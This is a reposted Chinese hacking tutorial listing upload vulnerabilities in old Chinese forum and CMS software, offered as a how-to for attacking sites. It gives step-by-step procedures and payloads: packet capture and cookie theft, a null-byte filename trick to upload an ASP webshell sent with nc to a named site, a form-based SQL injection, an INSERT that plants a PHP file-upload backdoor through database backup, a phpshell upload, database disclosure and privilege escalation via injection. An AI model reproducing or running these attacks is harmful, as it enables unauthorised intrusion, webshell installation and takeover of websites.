[转载]整站上传漏洞

来源：教师博客中心 http://js.blogchina.com/refer.11003.html

1.动网太经典了，懒得说了

2.星空 ：
漏洞出现在NF_visual_upfile.asp这个文件上
首先，咱们得先拿到COOKIE
用WINSOCK截包，拿到COOKIE
然后用老兵上传工具，老办法，上传，OK
CPB1.3上传漏洞
注册用户后，访问upload1.asp
抓包，用老兵通用WEB上传路径变量利用程序，路径是upload.asp。
3.动易上传漏洞  关键字 “Powered by: FreePower Ver 3.6”
注册一个会员
进入文章管理系统
打开软件添加
找到你要上传的ASP马儿
先别急着上传
呵呵
打开WSockExpert进行抓包
第一个工具
点上传
NND不让上传ASP地~~我呸~~当然不让传了~~要不还混个屁啊~~我汗
下面我们来看WSock
点上传之后把第三行和第四行复制到文件文件中，注意回车也应复制进去。保存为1.txt
下面我们来修改这个文件，这里与动网漏洞不同，它没有路径“filepath”，但它有文件名参数“filename”,改不了文件路径我们就改文件名！
找到filename="C:\Documents and Settings\Administrator\桌面\asp木马\myupn.asp"这一句，在ＡＳＰ后加一空格，然后加“.rar",变成
filename="C:\Documents and Settings\Administrator\桌面\asp木马\myupn.asp .rar"这样就可以骗过电脑，让它以为这个文件是rar文件，从而可以上传。

由于增加了５个字节，另一处也应相应修改：
Content-Length: 1561
Connection: Keep-Alive

改为
Content-Length: 1566
Connection: Keep-Alive


另存为2.txt

现在拿出whihex，打开2.txt，找到filename="C:\Documents and Settings\Administrator\桌面\asp木马\myupn.asp .rar这一字串，把与空格对应的十六进制代码20改为00，保存退出。我们要的数据就成了。
好OK


下面就是提交了。
打开ＣＭＤ，进入有ＮＣ的目录，用ＮＣ以如下命令提交我们的数据：
nc www.linweixiong.com 80 <2.txt

4.动感下载（老漏洞） upfile.asp

5.先把下面这些DD保存为**.htm
<FORM action="http://www.phack.org/cnelites/register.php?emailadd=and uid=100000&doublee=1" method="post" target="_blank">
用户名 :<INPUT name=username value="Visitor"><br>
密码：<INPUT name=password type=text value="hackbase"><br>
确认密码：<INPUT name=password2 type=text value="hackbase"><br>
E-mail ：<INPUT name=email value="4ngel@21cn.com"><br>
<INPUT type=submit value= 注册 name=regsubmit>
</FORM>

我的保存为edit.htm，

出现成功的字样，就登陆论坛，然后修改密码，再登陆，

签名那里要注意一下，最好就是删除签名，不然会提示你的签名多于80字节

进入后台，在数据库升级那里输入：

INSERT INTO `cdb_forumlinks` (`id`, `displayorder`, `name`, `url`, `note`, `logo`)
VALUES (&#39;&#39;, &#39;0&#39;, &#39;&#39;, &#39;&#39;, &#39;<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>&#39;, &#39;&#39;);

然后备份数据库为php结尾。

我把数据库的名字为：upfile.php

再写一个本地上传的表单：

<form ENCTYPE="multipart/form-data" ACTION="http://www.phack.org/cnelites/forumdata/upfile.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>

我们现在来提交shell
然后把phpshell上传上去。


出现这种情况就代表成功了。

我们的shell的名字为，php.php

那么访问地址是：http://www.phack.org/cnelites/forumdata/php.php

上传的东西都放在那个上传的表单的当前路径。


动画下载地址　http://hackbase.com/down/file.asp?id=20041110Discuz.zip

6.http://192.168.1.22:8000/ds/db/user.asp
这是暴库,在后面加上db/user.asp就可以暴出.
好了,现在我们来提升权限

我已注册一个用户linzi

看吧进来了,语句是
linzi&#39;,qx=&#39;1

因为普通用户的qx=5而1则是管理员的,我们这里用的语句是把我们的qx变为1,这里的原理大家去看相
关文章吧,

很多情况下,你得到的,也就是说暴库后,得到的是asp且不可以下载的,这里我来教大家怎么弄成可以下载的
也就是注是掉防下载语句.

看吧,这种是可以下载的,不可以下载的是这种.

看到了吧,我们更多的时候碰到的是这种,也就是防下载的,
好了,注是的方法也就是加入这一句<%%>
动画下载地址　http://hackbase.com/down/file.asp?id=20041110ds.zip
PS:编辑一下可能会好些